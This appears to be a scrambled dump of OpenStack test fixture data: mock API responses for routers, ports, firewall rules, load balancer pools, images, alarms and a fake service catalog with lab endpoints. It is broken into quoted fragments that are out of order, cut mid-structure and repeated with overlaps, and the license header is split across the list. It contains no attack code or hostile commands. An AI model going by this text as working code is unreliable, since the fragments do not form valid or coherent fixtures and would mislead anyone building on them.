"{ \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\",",
"ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\":",
"\"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] },",
"{ \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\":",
"\"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\":",
"STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14,",
"[ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [],",
"] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label",
"\"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": {",
"\"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }",
"PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\",",
"{ \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] },",
"\"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID,",
"\"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\":",
"'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id':",
"\"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\",",
"[ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] },",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT,",
"True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST",
"], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [",
"}, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\":",
"\"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ]",
"u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942',",
"3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\",",
"{ \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\":",
"METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0',",
"} }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name':",
"\"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\":",
"backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1],",
"{ \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\",",
"], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [",
"FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS",
"METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1]",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\":",
"\"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\",",
"required by applicable law or agreed to in writing, software # distributed under",
"\"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\"",
"\"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [],",
"\"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing",
"{ 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [],",
"\"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing",
"}, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"}, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID },",
"{ \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\"",
"in compliance with the License. You may obtain # a copy of the",
"'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region':",
"\"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\":",
"\"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [",
"\"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"\"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] }",
"'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region':",
"u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ],",
"\"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\":",
"\"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\":",
"'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles':",
"\"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\":",
"\"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\",",
"], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\":",
"+ ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False",
"\"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\",",
"[\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"]",
"\"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\":",
"\"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] },",
"\"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = {",
"} ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\",",
"False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ],",
"= [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\",",
"\"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12,",
"Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{",
"\"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] }",
"14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\",",
"\"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, {",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\":",
"{ \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id':",
"ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\",",
"[ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" }",
"\"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from",
"}], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True,",
"[ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\":",
"= '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT =",
"\"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\":",
"\"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST",
"{ \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\"",
"\"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, {",
"'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud',",
"\"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\":",
"{ \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\",",
"\"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = { \"servers\": [",
"{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'},",
"\"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None,",
"\"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\":",
"}, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\"",
"REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST",
"'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' }",
"= 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': {",
"\"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\",",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None }",
"\"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST =",
"SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\",",
"= { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID,",
"2.0 (the \"License\"); you may # not use this file except in compliance",
"Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT,",
"\"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\":",
"[ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] }",
"ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False },",
"\"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\":",
"# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT",
"\"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" },",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\":",
"\"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [ {",
"\"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\":",
"{ \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1],",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }",
"{}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST",
"\"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\":",
"\"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\":",
"\"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\",",
"u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ]",
"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID",
"\"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\":",
"LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"\"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4,",
"\"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\":",
"the specific language governing permissions and limitations # under the License. TOKEN_ID =",
"\"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My",
"\"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\",",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL':",
"'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}],",
"\"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\":",
"\"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ]",
"'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID },",
"LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\":",
"\"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\":",
"\"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\",",
"\"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False,",
"\"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\",",
"PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" }",
"None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ {",
"\"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\":",
